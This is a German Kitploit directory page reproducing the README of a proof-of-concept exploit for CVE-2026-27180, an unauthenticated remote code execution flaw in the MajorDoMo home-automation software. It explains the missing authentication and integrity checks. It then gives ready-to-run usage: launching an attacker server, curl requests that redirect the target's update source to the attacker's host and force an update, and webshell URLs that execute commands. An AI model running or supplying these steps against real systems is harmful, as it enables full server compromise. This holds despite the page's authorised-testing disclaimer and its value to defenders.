Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-27180-MajorDoMo-unauthenticated-RCE — Proof-of-Concept-Exploit für CVE-2026-27180, eine nicht authentifizierte RCE in MajorDoMo über Update-URL-Poisoning, die eine Webshell in das Web-Root ausliefert. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-27180-majordomo-unauthenticated-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubmbanyamer/cve-2026-27180-majordomo-unauthenticated-rce

CVE-2026-27180-MajorDoMo-unauthenticated-RCE

Proof-of-Concept-Exploit für CVE-2026-27180, eine nicht authentifizierte RCE in MajorDoMo über Update-URL-Poisoning, die eine Webshell in das Web-Root ausliefert.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

MajorDoMo RCE (CVE-2026-27180)

Author Python License: MIT CVE-2026-27180 Exploit Type

Unauthentifizierte Remote-Code-Ausführung durch Update-URL-Poisoning in MajorDoMo

CWE-494 – Download von Code ohne Integritätsprüfung
Auswirkung: Vollständige Serverkompromittierung durch Webshell im Web-Root
Erforderliche Authentifizierung: Keine
Patch: PR #1177

📜 Beschreibung

Dieses Repository enthält einen Proof-of-Concept-Exploit für – eine kritische, unauthentifizierte Remote-Code-Ausführungs-Schwachstelle in der Smart-Home-Automatisierungssoftware .

CVE-2026-27180
MajorDoMo

Ein Angreifer kann:

  • Die Update-Quell-URL ohne Authentifizierung manipulieren (Poisoning)
  • Ein Update erzwingen, das ein bösartiges Tarball herunterlädt und extrahiert
  • Beliebige PHP-Dateien (einschließlich Webshells) direkt im Web-Root platzieren

Die Schwachstelle besteht, weil:

  • Keine Authentifizierungsprüfung bei auto_update_settings und force_update-Modi
  • Keine TLS-Zertifikatsvalidierung (CURLOPT_SSL_VERIFYPEER = false)
  • Keine Signatur-/Integritätsprüfung heruntergeladener Update-Pakete
  • Extrahierte Dateien werden rekursiv in das Dokument-Root kopiert

🛠️ Funktionen

  • All-in-One-Python-Skript (keine externen Dateien erforderlich)
  • Bösartiger Atom-Feed + Tarball werden im Speicher generiert
  • Passwortgeschützte Multi-Methoden-Webshell (poc.php)
  • Optionales .htaccess zur Erzwingung der PHP-Ausführung
  • Saubere Konsolenausgabe mit Copy-Paste-Befehlen

🚀 Installation

root@kitploit:~
git clone https://github.com/YOUR-USERNAME/majordomo-cve-2026-27180-exploit.git
cd majordomo-cve-2026-27180-exploit
# Kein pip install erforderlich – nutzt nur Standardbibliothek + argparse

📊 PoC-Angriffsablauf

root@kitploit:~
graph TD
    A["Attacker starts malicious HTTP server\nserving /master.xml + /archive/master.tar.gz"] --> B["Attacker poisons update URL\nvia GET /objects/?module=saverestore&mode=auto_update_settings\n&set_update_url=http://attacker:8080"]
    B --> C["Attacker triggers update\nGET /objects/?module=saverestore&mode=force_update"]
    C --> D["MajorDoMo fetches poisoned Atom feed"]
    D --> E["Downloads malicious master.tar.gz\n(CURLOPT_SSL_VERIFYPEER=false)"]
    E --> F["Extracts tar.gz with tar xzvf ..."]
    F --> G["copyTree() copies files recursively\n→ poc.php & .htaccess land in web root"]
    G --> H["Attacker accesses webshell\nhttp://target/poc.php?pass=ChangeMe123&cmd=id"]

    style A fill:#f9d5e5,stroke:#333,stroke-width:2px
    style H fill:#c3e6cb,stroke:#333,stroke-width:2px

🖥️ Verwendung

Starten Sie den bösartigen Server:

root@kitploit:~
python3 exploit.py http://192.168.1.50:80 --lhost 192.168.1.100 --lport 8080

Nachdem der Server gestartet ist, führen Sie diese Befehle gegen das Ziel aus:

root@kitploit:~
# 1. Update-Quelle manipulieren (Poisoning)
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=auto_update_settings&set_update_url=http://192.168.1.100:8080'

# 2. Erzwungenes Update auslösen
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=force_update'

Warten Sie 10–90 Sekunden und testen Sie dann die Webshell:

root@kitploit:~
# Beispiele:
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=id
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=whoami
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=uname%20-a

⚠️ Rechtlicher & ethischer Hinweis

Dieser Code wird ausschließlich für Bildungszwecke, autorisierte Sicherheitstests und Red-Teaming-Aktivitäten bereitgestellt.

  • Verwenden Sie diesen Exploit NICHT gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unautorisierte Nutzung kann gegen Gesetze verstoßen, einschließlich des Computer Fraud and Abuse Act (CFAA) und entsprechender Gesetze weltweit.
  • Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch diesen Code verursacht werden.

📄 Lizenz

MIT-Lizenz

Copyright © 2026 Mohammed Idrees Banyamer

Hiermit wird jeder Person, die eine Kopie dieser Software und der zugehörigen Dokumentationsdateien (die „Software") erhält, kostenlos die Erlaubnis erteilt, die Software ohne Einschränkung zu nutzen, einschließlich und ohne Einschränkung der Rechte zur Verwendung, Vervielfältigung, Änderung, Zusammenführung, Veröffentlichung, Verteilung, Unterlizenzierung und/oder zum Verkauf von Kopien der Software, und Personen, denen die Software bereitgestellt wird, dies unter folgenden Bedingungen zu gestatten:

Der obige Urheberrechtshinweis und dieser Genehmigungshinweis müssen in allen Kopien oder wesentlichen Teilen der Software enthalten sein.

DIE SOFTWARE WIRD „WIE BESEHEN" BEREITGESTELLT, OHNE JEGLICHE AUSDRÜCKLICHE ODER IMPLIZITE GEWÄHRLEISTUNG, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER. IN KEINEM FALL SIND DIE AUTOREN ODER URHEBERRECHTSINHABER FÜR ANSPRÜCHE, SCHÄDEN ODER ANDERE HAFTUNGEN VERANTWORTLICH, SEI ES AUS VERTRAG, UNERLAUBTER HANDLUNG ODER ANDERWEITIG, DIE AUS ODER IM ZUSAMMENHANG MIT DER SOFTWARE ODER DER NUTZUNG ODER ANDEREN GESCHÄFTEN MIT DER SOFTWARE ENTSTEHEN.

Tool herunterladen